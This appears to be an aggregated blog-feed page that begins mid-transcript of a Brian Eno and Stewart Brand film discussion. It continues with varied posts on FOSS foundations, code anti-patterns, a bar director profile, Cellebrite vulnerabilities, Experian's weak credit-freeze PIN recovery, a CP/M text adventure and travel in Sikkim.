Brian Eno: Yes. I think one of the things that’s interesting when you watch somebody else’s take on your life, somebody writes a biography of you or recounts back to you a period that you lived through, is it makes you aware of how much you constructed the story that you hold yourself. You’ve got this kind of narrative, then I did this and then of course that led to that, and then I did that… And it all sort of makes sense when you tell the story, but when somebody else tells the story, it’s just like I was saying about conspiracy theories, to think that they can come up with a completely different story, and it’s actually equally plausible, and sometimes, frighteningly, even more plausible than the one you’ve been telling yourself.

Stewart Brand: Well, it gets stronger than that, because these are people who’ve done the research. So an example from the film is these guys really went through all my father’s film. There’s stuff in there I didn’t know about. There’s an incredibly sweet photograph of my young mother, my mother being young, and basically cradling the infant, me, and canoodling with me. I’d never seen that before. So I get a blast of, “Oh, mom, how great, thank you,” that I wouldn’t have gotten if they hadn’t done this research.

And lots of times, especially for Markoff’s research…So, Doug Engelbart and The Mother of All Demos, I have a story I’ve been telling for years to myself and to the world of how I got involved in being a sort of filmmaker within that project. It turned out I had just completely forgotten that I’d actually studied Doug Engelbart before any of that, and I was going to put him in an event I was going to organize called the Education Fair, and the whole theory of his approach, very humanist approach to computers and the use of computers, computers basically blending in to human collaboration, was something I got very early. And I did the Trips Festival and he sort of thought I was a showman and then they brought me on as the adviser to the actual production. But the genesis of the event, I’d been telling this wrong story for years. There’s quite a lot of that. As you say, I think our own view of ourselves becomes fiction very quickly.

Brian Eno: Yes. Yes. It’s partly because one wants to see a kind of linear progression and a causality. One doesn’t really want to admit that there was a lot of randomness in it, that if you’d taken that turning on the street that day, life would have panned out completely differently. That’s so disorientating, that thought, that we don’t tolerate it for long. We sort of patch it up to make the story hold together.

Stewart Brand: That’s what you’ll get from the Tom Stoppard biography. Remember that his first serious, well, popular play was Rosencrantz and Guildenstern Are Dead, and it starts with a flip of a coin. It turns out his own past of how he got from Singapore to India and things like that were just these kind of random war-related events that carved a path of chance, chance, chance, chance, that then informed his creative life for the rest of his life. There’s a book coming out from Daniel Kahneman called Noise, that Bachman and Kahneman and another guy have generated. It looks like it’s going to be fantastic. Basically, he’s going beyond Thinking Fast and Slow to…a whole lot of the data that science and our world and the mind deals with is this kind of randomized, stochastic noise, which we then interpret as signal. And it’s not. It’s hard to hold it in your mind, that randomness. It’s one of the things I appreciate from having studied evolution at an impressionable age, is that a lot of evolution is: randomness is not a bad thing that happens. Randomness is the most creative thing that happens.

Brian Eno: Yes. Well, we are born pattern recognizers. If we don’t find them, we’ll construct them. We take all the patterns that we recognize very seriously. We think that they are reality. But they aren’t necessarily exclusive. They’re not exclusive realities.

Jason Sussberg: All right. I hate to end it here. This discussion is really fascinating. We’re getting into some very heady philosophical ideas. But unfortunately, our time is short. So we have to bid both Stewart and Brian farewell. I encourage everybody to go watch the film We Are as Gods, if you haven’t already. Thank you so much for participating in this discussion.

David Alvarado: A special thanks to Stripe Press for helping make this film a reality. Thank you to you, the viewer, for watching, to Stewart for sharing your life, and Brian for this amazing original score.

Brian Eno: Good. Well, good luck with it. I hope it does very well.

Planet DebianMartin Michlmayr: Research on FOSS foundations

I worked on research on FOSS foundations and published two reports:

Growing Open Source Projects with a Stable Foundation

This primer covers non-technical aspects that the majority of projects will have to consider at some point. It also explains how FOSS foundations can help projects grow and succeed.

This primer explains:

  • What issues and areas to consider
  • How other projects and foundations have approached these topics
  • What FOSS foundations bring to the table
  • How to choose a FOSS foundation

You can download Growing Open Source Projects with a Stable Foundation.

Research report

The research report describes the findings of the research and aims to help understand the operations and challenges FOSS foundations face.

This report covers topics such as:

  • Role and activities of foundations
  • Challenges faced and gaps in the service offerings
  • Operational aspects, including reasons for starting an org and choice of jurisdiction
  • Trends, such as the "foundation in a foundation" model
  • Recommendations for different stakeholders

You can download the research report.


This research was sponsored by the Ford Foundation and the Alfred P. Sloan Foundation. The research was part of their Critical Digital Infrastructure Research initiative, which investigates the role of open source in digital infrastructure.

Worse Than FailureCodeSOD: An Exceptional Warning

Pierre inherited a PHP application. The code is pretty standard stuff, for a long-living PHP application which has been touched by many developers with constantly shifting requirements. Which is to say, it's a bit of a mess.

But there's one interesting quirk that shows up in the codebase. At some point, someone working on the project added a kinda stock way they chose to handle exceptions. Future developers saw that, didn't understand it, and copied it to just follow what appeared to be the "standard".

And that's why so many catch blocks look like this:

catch (ZendException $e) {
    $e = $e; // no warning
}

Pierre and a few peers spent more time than they should have puzzling over the comment, before they realized that a catch block which never uses the caught exception would trigger an "unused variable" warning in their linter. By setting the variable equal to itself, it got "used".

This is in lieu of, y'know, disabling that warning, or, even better, addressing the issue by making sure you don't just blindly swallow exceptions and hope it's not a problem.
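For comparison, here is a hedged sketch of the honest alternative, shown in Java rather than the article's PHP (the names `CatchDemo` and `parseOrDefault` are hypothetical, not from Pierre's codebase): if a failure is genuinely recoverable, handle it and record why, instead of tricking the linter into silence.

```java
// Hypothetical sketch: handle the exception instead of swallowing it
// and self-assigning the variable to dodge an "unused variable" warning.
import java.util.logging.Level;
import java.util.logging.Logger;

public class CatchDemo {
    private static final Logger LOG = Logger.getLogger(CatchDemo.class.getName());

    static int parseOrDefault(String s, int fallback) {
        try {
            return Integer.parseInt(s);
        } catch (NumberFormatException e) {
            // The exception is actually used: log the cause of the fallback.
            LOG.log(Level.FINE, "falling back to default for input: " + s, e);
            return fallback;
        }
    }

    public static void main(String[] args) {
        System.out.println(parseOrDefault("42", 0));   // 42
        System.out.println(parseOrDefault("oops", 0)); // 0
    }
}
```

Many linters also accept a naming convention (e.g. calling the variable `ignored`) when swallowing really is intentional, which documents the intent instead of obscuring it.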

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!

Planet DebianRussell Coker: Links April 2021

Dr Justin Lehmiller’s blog post comparing his official (academic style) and real biographies is interesting [1]. Also the rest of his blog is interesting too, he works at the Kinsey Institute so you know he’s good.

Media Matters has an interesting article on the spread of vaccine misinformation on Instagram [2].

John Goerzen wrote a long post summarising some of the many ways of having a decentralised Internet [3]. One problem he didn’t address is how to choose between them; I could spend months of work setting up a fraction of those services.

Erasmo Acosta wrote an interesting Medium article “Could Something as Pedestrian as the Mitochondria Unlock the Mystery of the Great Silence?” [4]. I don’t know enough about biology to determine how plausible this is. But it is a worry; I hope that humans will meet extra-terrestrial intelligences at some future time.

Meredith Haggerty wrote an insightful Medium article about the love vs money aspects of romantic comedies [5]. Changes in viewer demographics would be one factor that makes lead actors in romantic movies significantly less wealthy in recent times.

Informative article about ZIP compression and the history of compression in general [6].

Vice has an insightful article about one way of taking over SMS access of phones without affecting voice call or data access [7]. With this method the victim won’t notice that their service is being interfered with until it’s way too late. They also explain the chain of problems in the US telecommunications industry that led to this. I wonder what’s happening in this regard in other parts of the world.

The clown code of ethics (8 Commandments) is interesting [8].

Sam Hartman wrote an insightful blog post about the problems with RMS and how to deal with him [9]. Also Sam Whitton has an interesting take on this [10]. Another insightful post is by Selam G about RMS long history of bad behavior and the way universities are run [11].

Cory Doctorow wrote an insightful article for Locus about free markets with a focus on DRM on audio books [12]. We need legislative changes to fix this!

Planet DebianJunichi Uekawa: Swapping caps and control in X11.

Swapping caps and control in X11. The configuration is at /etc/default/keyboard, and both the virtual console and X11 use that configuration in Debian. For systemd users, systemd-localed.service can be used for configuration via the localectl(1) command, and Debian's systemd has been patched to update /etc/default/keyboard (managed by the keyboard-configuration package). Not sure where to find documentation for this. systemd for Debian is patched with debian/patches/debian/Use-Debian-specific-config-files.patch to change /etc/X11/xorg.conf.d/00-keyboard.conf to /etc/default/keyboard.
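A minimal sketch of what such a configuration might look like on Debian (the XKBMODEL and XKBLAYOUT values here are example values; adjust them for your hardware and locale — ctrl:swapcaps is the XKB option that swaps Caps Lock and Left Control):

```
# /etc/default/keyboard -- example values, not universal defaults
XKBMODEL="pc105"
XKBLAYOUT="us"
XKBVARIANT=""
XKBOPTIONS="ctrl:swapcaps"
```

For systemd users, the equivalent via localectl would be something like `localectl set-x11-keymap us pc105 "" ctrl:swapcaps` (arguments are layout, model, variant, options).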

Planet DebianRuss Allbery: Review: Beyond Shame

Review: Beyond Shame, by Kit Rocha

Series: Beyond #1
Publisher: Kit Rocha
Copyright: December 2013
Format: Kindle
Pages: 270

I read this book as part of the Beyond Series Bundle (Books 1-3), which is what the sidebar information is for.

Noelle is a child of Eden, the rich and technologically powerful city of a post-apocalyptic world. As the daughter of a councilman, she had everything she wanted except the opportunity to feel. Eden's religious elite embrace a doctrine of strict Puritanism: Even hugging one's children was frowned upon, let alone anything related to sex. Noelle was too rebellious to settle for that, which is why this book opens with her banished from Eden, ejected into Sector Four. The sectors are the city slums, full of gangs and degenerates and violence, only a slight step up from the horrific farming communes. Luckily for her, she literally stumbles into one of the lieutenants of the O'Kane gang, who are just as violent as their reputations but who have surprising sympathy for a helpless city girl.

My shorthand distinction between romance and erotica is that romance mixes some sex into the plot and erotica mixes some plot into the sex. Beyond Shame is erotica, specifically BDSM erotica. The forbidden sensations that Noelle got kicked out of Eden for pursuing run strongly towards humiliation, which is tangled up in the shame she was taught to feel about anything sexual. There is a bit of a plot surrounding the O'Kanes who take her in, their leader, some political skulduggery that eventually involves people she knows, and some inter-sector gang warfare, but it's quite forgettable (and indeed I've already forgotten most of it). The point of the story is Noelle navigating a relationship with Jasper (among others) that involves a lot of very graphic sex.

I was of two minds about reviewing this. Erotica is tricky to review, since to an extent it's not trying to do what most books are doing. The point is less to tell a coherent story (although that can be a bonus) than it is to turn the reader on, and what turns the reader on is absurdly personal and unpredictable. Erotica is arguably more usefully marked with story codes (which in this case would be something like MF, MMFF, FF, Mdom, Fdom, bd, ds, rom, cons, exhib, humil, tattoos) so that the reader has an idea whether the scenarios in the story are the sort of thing they find hot.

This is particularly true of BDSM erotica, since the point is arousal from situations that wouldn't work or might be downright horrifying in a different sort of book. Often the forbidden or taboo nature of the scene is why it's erotic. For example, in another genre I would complain about the exaggerated and quite sexist gender roles, where all the men are hulking cage fighters who want to control the women, but in male-dominant BDSM erotica that's literally the point.

As you can tell, I wrote a review anyway, primarily because of how I came to read this book. Kit Rocha (which is a pseudonym for the writing team of Donna Herren and Bree Bridges) recently published Deal with the Devil, a book about mercenary librarians in a post-apocalyptic future. Like every right-thinking person, I immediately wanted to read a book about mercenary librarians, but discovered that it was set in an existing universe. I hate not starting at the beginning of things, so even though there was probably no need to read the earlier books first, I figured out Beyond Shame was the first in this universe and the bundle of the first three books was only $2.

If any of you are immediately hooked by mercenary librarians but are back-story completionists, now you know what you'll be getting into.

That said, there are a few notable things about this book other than it has a lot of sex. The pivot of the romantic relationship was more interesting and subtle than most erotica. Noelle desperately wants a man to do all sorts of forbidden things to her, but she starts the book unable to explain or analyze why she wants what she wants, and both Jasper and the story are uncomfortable with that and unwilling to leave it alone. Noelle builds up a more coherent theory of herself over the course of the book, and while it's one that's obviously designed to enable lots of erotic scenes, it's not a bad bit of character development.

Even better is Lex, the partner (sort of) of the leader of the O'Kane gang and by far the best character in the book. She takes Noelle under her wing from the start, and while that relationship is sexualized like nearly everything in this book, it also turns into an interesting female friendship that I would have also enjoyed in a different genre. I liked Lex a lot, and the fact she's the protagonist of the next book might keep me reading.

Beyond Shame also has a lot more female gaze descriptions of the men than is often the case in male-dominant BDSM. The eye candy is fairly evenly distributed, although the gender roles are very much not. It even passes the Bechdel test, although it is still erotica and nearly all the conversations end up being about sex partners or sex eventually.

I was less fond of the fact that the men are all dangerous and violent and the O'Kane leader frequently acts like a controlling, abusive psychopath. A lot of that was probably the BDSM setup, but it was not my thing. Be warned that this is the sort of book in which one of the (arguably) good guys tortures someone to death (albeit off camera).

Recommendations are next to impossible for erotica, so I won't try to give one. If you want to read the mercenary librarian novel and are dubious about this one, it sounds like (although I can't confirm) that it's a bit more on the romance end of things and involves a lot fewer group orgies. Having read this book, I suspect it was entirely unnecessary to have done so for back-story. If you are looking for male-dominant BDSM, Beyond Shame is competently written, has a more thoughtful story than most, and has a female friendship that I fully enjoyed, which may raise it above the pack.

Rating: 6 out of 10


LongNowMeet Ty Caudle, The Interval’s New Beverage Director

Long Now is pleased to announce that longtime Interval bartender Ty Caudle will become The Interval’s next Beverage Director. He takes the reins from Todd Carnam, who has moved to Washington, D.C. after a creative three-year run at the helm. 

“We are very excited and grateful to have Ty in such a strong position to make this transition both seamless and inspired,” says Alexander Rose, Long Now’s Executive Director and Founder of The Interval. 

Caudle’s bartending career began at a small backyard party in San Francisco. He was working as a caterer for the event, and when the bartender failed to show, he was thrust into the role despite having zero experience.

“We had no idea what we were doing,” he says, “but there was definitely an energy to bartending that wasn’t otherwise present in catering.”

After a friend gifted him a copy of Imbibe! by David Wondrich, Caudle knew he’d found his calling.

“The book opened up a world that I otherwise would’ve never known,” he says. “It traced the history of forgotten ingredients and techniques, painted a rich tapestry of the world of bartending in the 01800s, and most importantly taught me that tending bar was a legitimate profession, one to be studied and practiced.”

Ty Caudle at The Interval. 

And so he did. Caudle devoured every bartending book he could find, bought esoteric cocktail ingredients, and experimented at home. He visited distilleries in Kentucky, Tequila, Oaxaca, Ireland, and Copenhagen to learn more about how different cultures approached spirit production.

“Those trips cemented my deep respect for the craft and history of distillation,” he says. “Whether on a tropical hillside under a tin roof or in a cacophonous bustling factory, spirit production is one of humanity’s great achievements. As bartenders, we have a responsibility to honor those artisans’ tireless efforts with every martini or manhattan we stir.”

Breaking through in the industry during the Great Recession, however, proved challenging. Caudle eventually landed a gig prepping the bar at the now-shuttered Locanda in the Mission. This led to other bartending opportunities at a small handful of spaces in the same neighborhood as Locanda.

The Interval at Long Now.

The Interval opened its doors in 02014 with Jennifer Colliau as its Beverage Director. Colliau was something of a legend in the Bay Area’s vibrant bar scene, having founded Small Hand Foods after eight years tending bar at San Francisco’s celebrated Slanted Door restaurant.

Caudle was a big fan of Colliau’s work, and promptly responded to an ad for a part-time bartender position at The Interval.

Jennifer Colliau, The Interval’s first Beverage Director. 

“The job listing was decidedly different,” Caudle says. “It gave me a glimpse of how unique The Interval is.”

Following a promising interview with then-Bar Manager Haley Samas-Berry, Caudle returned to The Interval a few days later for a stage. Expecting to find Samas-Berry behind the bar, Caudle was mortified to find Colliau there instead. Caudle was, suffice it to say, a little intimidated:  

I walked over with my shakers and spoons and jigger, hands trembling, and she asked if I wouldn’t mind making drinks with their tools instead. I said, “Sure,” as I walked into the other room to set my things down. Inside I was completely freaking out. It took every bit of my strength to emerge from that space. I already felt in over my head and this amplified it. For the next hour or so I welcomed guests and set down menus and poured water. Every time a drink order came in Jennifer would stand over my shoulder and recite the recipe to me while correcting a litany of technical mistakes that I was making. The torture finally relented and we went upstairs and had a good conversation. But I remember leaving that night thinking there was just no way in hell I was going to get that job. 

Caudle got the job. And now, following years of excellent work, he’s got Colliau’s old job, too. 

We spoke with Caudle about his new role, his approach to cocktail creation and design, and what Interval patrons can expect once the bar fully reopens.

Your promotion to Beverage Director brings the opportunity to try new things, while also contending with a rich legacy from past Beverage Directors Jennifer Colliau and Todd Carnam. What new things are you excited to bring to the table? What do you hope to maintain from the past?

I feel uniquely positioned as I have worked in the space under the tutelage of both Jennifer and Todd. 

Jennifer set the standard and created the beverage identity of The Interval. She taught us that we can’t unknow things. To that end, I’m excited to continue the pursuit of the best version of a beverage, meticulously molding it while uncovering its rich history.

The Interval’s former Beverage Directors Jennifer Colliau and Todd Carnam

Todd is a storyteller and a curmudgeonly romantic at heart. He taught us that a drink can evoke a feeling and connect to a larger narrative, of the cocktail’s role as a totem. I hope to honor that spirit and the creativity it fosters in my approach to menu development.

Foremost, I’m excited to feature wine, beer, and spirits made by people that don’t look like me. I’m personally captivated by the fantastic complexity of what eventually winds up in a glass on the bar. Every drink is the confluence of many brilliant makers and I seek to pay respect to their efforts. I think it is easy for us to forget that alcohol is an agricultural product. It started as a plant in the ground in a corner of the world and so many things had to go right for it to find its way to us. I hope to imbue our staff with a passion for the process of making these delicious products and to craft drinks that honor them.

A trio of selections from The Interval’s Old Fashioned menu.

What’s your approach to cocktail design and creation?

I can be somewhat reluctant to design new drinks. The cocktail world has such a rich history and so many people have contributed across generations. With that in mind, I often find myself focusing on making the very best version of a beverage that we know well or that may have been overlooked. 

It tends to take me a long time to mold a bigger picture of what the theme of a cocktail or a menu should be. Once I have that in place I get excited to uncover pieces that fit into the whole. Our Tiki Not Tiki menu is a great example. After we established that template, I found myself scouring cocktail books and menus for tropical drinks that didn’t fit into the Tiki canon. Each discovery was a revelation, a spark to continue forth.

Mai Tai from The Interval’s Tiki Not Tiki menu. 

What’s one of the most challenging cocktails for The Interval to make? 

Generally, we like to do as much work behind the scenes preparing ingredients and putting things together ahead of time to ensure cocktails get to guests quickly.

The Interval’s take on the Kalimotxo.

I will say that one of our biggest challenges in development came with the Kalimotxo. This simple Spanish blend of Coca Cola and box wine was incredibly difficult to replicate. For starters, it was extremely trying to imitate the singular flavor of coke, eventually replacing its woodsy vanilla with Carpano Antica and its baking spice notes with lots of Angostura. Harder still was finding a red wine that didn’t overpower the rest of the ingredients. In the end, we wound up bringing in an entirely new wine outside of our offerings just to get the final flavor profile we were looking for.

Everyone has different tastes, but what would you recommend as a cocktail for a first-timer to the Interval to highlight what distinguishes the establishment from other cocktail bars?

The Interval’s Navy Gimlet.

The Navy Gimlet perfectly encapsulates what we strive for at The Interval. With the time involved to infuse navy strength gin with lime oil and to slowly filter the finished product, its preparation takes days but arrives to the guest in no time at all. The gimlet has been maligned for decades as a result of artificial ingredients and certain preparations and we’ve done our very best to correct those deficiencies. We make a delicious lime cordial and stir (rather than shake) our pearlescent iteration. It’s a drink with a history, deceptively simple and infinitely refreshing.

A busy evening at The Interval, May 02016. 

What do you think is the biggest misconception people have about tending bar?

I think the physical act of bartending is unnecessarily heralded in the public eye. Anyone can mix drinks. Sure, there are hundreds of classics to memorize and plenty of muscle memory to establish, but that side of tending bar is overwhelmingly a teachable skill.

The component that cannot be taught as easily is hospitality. There is a degree of empathy and emotional availability necessary to do this work that isn’t required in many other professions. Bartenders absorb the energy of every guest that sits in front of them and a genuine desire to serve is essential to providing a superior guest experience. This comes naturally to some and can be a lifelong pursuit for others. Putting aside the day thus far and being truly hospitable behind the bar is the goal we spend our careers striving for. 

For the latest on opening hours, placing to-go orders, and events, head to The Interval’s website, or follow The Interval on Instagram, Twitter, and Facebook.

Worse Than FailureCodeSOD: Absolute Mockery

At a certain point, it becomes difficult to write a unit test without also being able to provide mocked implementations of some of the code. But mocking well is its own art- it's easy to fall into the trap of writing overly complex mocks, or mocking the wrong piece of functionality, and ending up in situations where your tests end up spending more time testing their mocks than your actual code.

Was Rhonda's predecessor thinking of any of those things when writing code? Were they aware of the challenges of writing useful mocks, of managing dependency injection? Or was this Java solution the best they could come up with:

public class Person {
    private int age;
    private String name;

    public int getAge() {
        if (Testing.isTest)
            return 27;
        else
            return age;
    }

    public String getName() {
        if (Testing.isTest)
            return "John Smith";
        else
            return name;
    }

    // and so on ..
}

Every method was written like this. Every method. Each method contained its own mockery, and in turn, made a mockery of test-driven development.
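For contrast, a minimal sketch of the conventional alternative — dependency injection — using hypothetical names (`PersonRepository`, `GreetingService`) that are not from Rhonda's codebase: the code under test depends on an interface, and the test hands in a fake implementation, so production code never needs a global `Testing.isTest` flag.

```java
// Hypothetical sketch of constructor injection: the test supplies a
// fake repository; production code wires in the real one. No global
// test flag, no hard-coded "John Smith" in the production path.
interface PersonRepository {
    Person findById(int id);
}

class Person {
    private final String name;
    private final int age;
    Person(String name, int age) { this.name = name; this.age = age; }
    String getName() { return name; }
    int getAge() { return age; }
}

class GreetingService {
    private final PersonRepository repo;
    GreetingService(PersonRepository repo) { this.repo = repo; }
    String greet(int id) {
        Person p = repo.findById(id);
        return "Hello, " + p.getName() + " (" + p.getAge() + ")";
    }
}

public class Demo {
    public static void main(String[] args) {
        // In a test, the "mock" is just a hand-rolled fake:
        PersonRepository fake = id -> new Person("John Smith", 27);
        GreetingService svc = new GreetingService(fake);
        System.out.println(svc.greet(1)); // Hello, John Smith (27)
    }
}
```

The fake stays in the test code, the production class stays honest, and no linter tricks or flag checks are required.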

[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.

Cryptogram Security Vulnerabilities in Cellebrite

Moxie Marlinspike has an intriguing blog post about Cellebrite, a tool used by police and others to break into smartphones. Moxie got his hands on one of the devices, which seems to be a pair of Windows software packages and a whole lot of connecting cables.

According to Moxie, the software is riddled with vulnerabilities. (The one example he gives is that it uses FFmpeg DLLs from 2012 that have not been patched with the 100+ security updates since then.)

…we found that it’s possible to execute arbitrary code on a Cellebrite machine simply by including a specially formatted but otherwise innocuous file in any app on a device that is subsequently plugged into Cellebrite and scanned. There are virtually no limits on the code that can be executed.

This means that Cellebrite has one — or many — remote code execution bugs, and that a specially designed file on the target phone can infect Cellebrite.

For example, by including a specially formatted but otherwise innocuous file in an app on a device that is then scanned by Cellebrite, it’s possible to execute code that modifies not just the Cellebrite report being created in that scan, but also all previous and future generated Cellebrite reports from all previously scanned devices and all future scanned devices in any arbitrary way (inserting or removing text, email, photos, contacts, files, or any other data), with no detectable timestamp changes or checksum failures. This could even be done at random, and would seriously call the data integrity of Cellebrite’s reports into question.

That malicious file could, for example, insert fabricated evidence or subtly alter the evidence it copies from a phone. It could even write that fabricated/altered evidence back to the phone so that from then on, even an uncorrupted version of Cellebrite will find the altered evidence on that phone.

Finally, Moxie suggests that future versions of Signal will include such a file, sometimes:

Files will only be returned for accounts that have been active installs for some time already, and only probabilistically in low percentages based on phone number sharding.

The idea, of course, is that a defendant facing Cellebrite evidence in court can claim that the evidence is tainted.

I have no idea how effective this would be in court. Or whether this runs foul of the Computer Fraud and Abuse Act in the US. (Is it okay to booby-trap your phone?) A colleague from the UK says that this would not be legal to do under the Computer Misuse Act, although it’s hard to blame the phone owner if he doesn’t even know it’s happening.


Krebs on SecurityExperian’s Credit Freeze Security is Still a Joke

In 2017, KrebsOnSecurity showed how easy it is for identity thieves to undo a consumer’s request to freeze their credit file at Experian, one of the big three consumer credit bureaus in the United States.  Last week, KrebsOnSecurity heard from a reader who had his freeze thawed without authorization through Experian’s website, and it reminded me of how truly broken authentication and security remains in the credit bureau space.

Experian’s page for retrieving someone’s credit freeze PIN requires little more information than has already been leaked by big-three bureau Equifax and a myriad other breaches.

Dune Thomas is a software engineer from Sacramento, Calif. who put a freeze on his credit files last year at Experian, Equifax and TransUnion after thieves tried to open multiple new payment accounts in his name using an address in Washington state that was tied to a vacant home for sale.

But the crooks were persistent: Earlier this month, someone unfroze Thomas’ account at Experian and promptly applied for new lines of credit in his name, again using the same Washington street address. Thomas said he only learned about the activity because he’d taken advantage of a free credit monitoring service offered by his credit card company.

Thomas said after several days on the phone with Experian, a company representative acknowledged that someone had used the “request your PIN” feature on Experian’s site to obtain his PIN and then unfreeze his file.

Thomas said he and a friend both walked through the process of recovering their freeze PIN at Experian, and were surprised to find that just one of the five multiple-guess questions they were asked after entering their address, Social Security Number and date of birth had anything to do with information only the credit bureau might know.

KrebsOnSecurity stepped through the same process and found similar results. The first question asked about a new mortgage I supposedly took out in 2019 (I didn’t), and the answer was none of the above. The answer to the second question also was none of the above.

The next two questions were useless for authentication purposes because they’d already been asked and answered; one was “which of the following is the last four digits of your SSN,” and the other was “I was born within a year or on the year of the date below.” Only one question mattered and was relevant to my credit history (it concerned the last four digits of a checking account number).

The best part about this lax authentication process is that one can enter any email address to retrieve the PIN — it doesn’t need to be tied to an existing account at Experian. Also, when the PIN is retrieved, Experian doesn’t bother notifying any other email addresses already on file for that consumer.

Finally, your basic consumer (read: free) account at Experian does not give users the option to enable any sort of multi-factor authentication that might help stymie some of these PIN retrieval attacks on credit freezes.

Unless, that is, you subscribe to Experian’s heavily-marketed and confusingly-worded “CreditLock” service, which charges between $14.99 and $24.99 a month for the ability to “lock and unlock your file easily and quickly, without delaying the application process.” CreditLock users can both enable multifactor authentication and get alerts when someone tries to access their account.

Thomas said he’s furious that Experian only provides added account security for consumers who pay for monthly plans.

“Experian had the ability to give people way better protection through added authentication of some kind, but instead they don’t because they can charge $25 a month for it,” Thomas said. “They’re allowing this huge security gap so they can make a profit. And this has been going on for at least four years.”

Experian has not yet responded to requests for comment.

When a consumer with a freeze logs in to Experian’s site, they are immediately directed to a message for one of Experian’s paid services, such as its CreditLock service. The message I saw upon logging in confirmed that while I had a freeze in place with Experian, my current “protection level” was “low” because my credit file was unlocked.

“When your file is unlocked, you’re more vulnerable to identity theft and fraud,” Experian warns, untruthfully. “You won’t see alerts if someone tries to access your file. Banks can check your file if you apply for credit or loans. Utility and service providers can see your credit file.”

Experian says my security is low because while I have a freeze in place, I haven’t bought into their questionable “lock service.”

Sounds scary, right? The thing is — except for the part about not seeing alerts — none of the above statement is true if you already have a freeze on your file. A security freeze essentially blocks any potential creditors from being able to view your credit file, unless you affirmatively unfreeze or thaw your file beforehand.

With a freeze in place on your credit file, ID thieves can apply for credit in your name all they want, but they will not succeed in getting new lines of credit in your name because few if any creditors will extend that credit without first being able to gauge how risky it is to loan to you (i.e., view your credit file). It is now free to freeze your credit in all U.S. states and territories.

Experian, like the other consumer credit bureaus, uses their intentionally confusing “lock” terminology to frighten consumers into paying for monthly subscription services. A key selling point for these lock services is they can be a faster way to let creditors peek at your file when you wish to apply for new credit. That may or may not be true in practice, but consider why it’s so important for Experian to get consumers to sign up for their lock programs.

The real reason is that Experian makes money every time someone makes a credit inquiry in your name, and it does not want to do anything to hinder those inquiries. Signing up for a lock service lets Experian continue selling credit report information to a variety of third parties. According to Experian’s FAQ, when locked your Experian credit file remains accessible to a host of companies, including:

-Potential employers or insurance companies

-Collection agencies acting on behalf of companies you may owe

-Companies providing pre-screened credit card offers

-Companies that have an existing credit relationship with you (this is true for frozen files also)

-Personalized offers from Experian, if you choose to receive them

It is annoying that Experian can get away with offering additional account security only to people who pay the company a hefty sum each month to sell their information. It’s also amazing that this sloppy security I wrote about back in 2017 is still just as prevalent in 2021.

But Experian is hardly alone. In 2019, I wrote about how Equifax’s new MyEquifax site made it simple for thieves to lift an existing credit freeze at Equifax and bypass the PIN if they were armed with just your name, Social Security number and birthday.

Also in 2019, identity thieves were able to get a copy of my credit report from TransUnion after successfully guessing the answers to multiple-guess questions like the ones Experian asks. I only found out after hearing from a detective in Washington state, who informed me that a copy of the report was found on a removable drive seized from a local man who was arrested on suspicion of being part of an ID theft gang.

TransUnion investigated and found it was indeed at fault for giving my credit report to ID thieves, but that on the bright side its systems blocked another fraudulent attempt at getting my report in 2020.

“In our investigation, we determined that a similar attempt to fraudulently obtain your report occurred in April 2020, and was successfully blocked by enhanced controls TransUnion has implemented since last year,” the company said. “TransUnion deploys a multi-layered security program to combat the ongoing and increasing threat of fraud, cyber-attacks and malicious activity.  In today’s dynamic threat environment, TransUnion is constantly enhancing and refining our controls to address the latest security threats, while still allowing consumers access to their information.”

For more information on credit freezes (also called “security freezes”), how to request one, and other tips on preventing identity fraud, check out this story.

If you haven’t done so lately, it might be a good time to order a free copy of your credit report. Each consumer is entitled to one free copy of their credit report annually from each of the three credit bureaus, either all at once or spread out over the year.

Planet DebianSteve Kemp: Writing a text-based adventure game for CP/M

In my previous post I wrote about how I'd been running CP/M on a Z80-based single-board computer.

I've been slowly working my way through a bunch of text-based adventure games:

  • The Hitchhiker's Guide To The Galaxy
  • Zork 1
  • Zork 2
  • Zork 3

Along the way I remembered how much fun I used to have doing this in my early teens, and decided to write my own text-based adventure.

Since I'm not a masochist I figured I'd write something with only three or four locations, and solicited Facebook for ideas. Shortly afterwards a "plot" was created and I started work.

I figured that the very last thing I wanted to be doing was to be parsing text-input with Z80 assembly language, so I hacked up a simple adventure game in C. I figured if I could get the design right that would ease the eventual port to assembly.

I had the realization pretty early that using a table-driven approach would be the best way - using structures to contain the name, description, and function-pointers appropriate to each object for example. In my C implementation I have things that look like this:

{name: "generator",
 desc: "A small generator.",
 use: use_generator,
 use_carried: use_generator_carried,
 get_fn: get_generator,
 drop_fn: drop_generator},

A bit noisy, but simple enough. If an object cannot be picked up, or dropped, the corresponding entries are blank:

{name: "desk",
 desc: "",
 edesc: "The desk looks solid, but old."},

Here we see something that is special, there's no description so the item isn't displayed when you enter a room, or LOOK. Instead the edesc (extended description) is available when you type EXAMINE DESK.

Anyway over a couple of days I hacked up the C-game, then I started work porting it to Z80 assembly. The implementation changed, the easter-eggs were different, but on the whole the two things are the same.

Certainly 99% of the text was recycled across the two implementations.

Anyway in the unlikely event you've got a craving for a text-based adventure game I present to you:

Cory DoctorowNorwegian and German editions of How to Destroy Surveillance Capitalism

Thanks to groups of German- and Norwegian-speaking volunteers, there’s now a CC-licensed Norwegian and German edition of How to Destroy Surveillance Capitalism! They join the existing French edition.

Cory DoctorowHow To Destroy Surveillance Capitalism (Part 04)

This week on my podcast, part four of a serialized reading of my 2020 Onezero/Medium book How To Destroy Surveillance Capitalism, now available in paperback (you can also order signed and personalized copies from Dark Delicacies, my local bookstore).


Planet DebianVishal Gupta: Ramblings // On Sikkim and Backpacking

What I loved the most about Sikkim can’t be captured on cameras. It can’t be taped since it would be intrusive and it can’t be replicated because it’s unique and impromptu. It could be described, as I attempt to, but more importantly, it’s something that you simply have to experience to know.

Now I first heard about this from a friend who claimed he’d been offered free rides and Tropicanas by locals after finishing the Ladakh Marathon. And then I found Ronnie’s song, whose chorus goes : “Dil hai pahadi, thoda anadi. Par duniya ke maya mein phasta nahi” (My heart belongs to the mountains. Although a little childish, it doesn’t get hindered by materialism). While the song refers to his life in Manali, I think this holds true for most Himalayan states.

Maybe it’s the pleasant weather, the proximity to nature, the sense of safety from Indian Army being round the corner, independence from material pleasures that aren’t available in remote areas or the absence of the pollution, commercialisation, & cutthroat-ness of cities, I don’t know, there’s just something that makes people in the mountains a lot kinder, more generous, more open and just more alive.

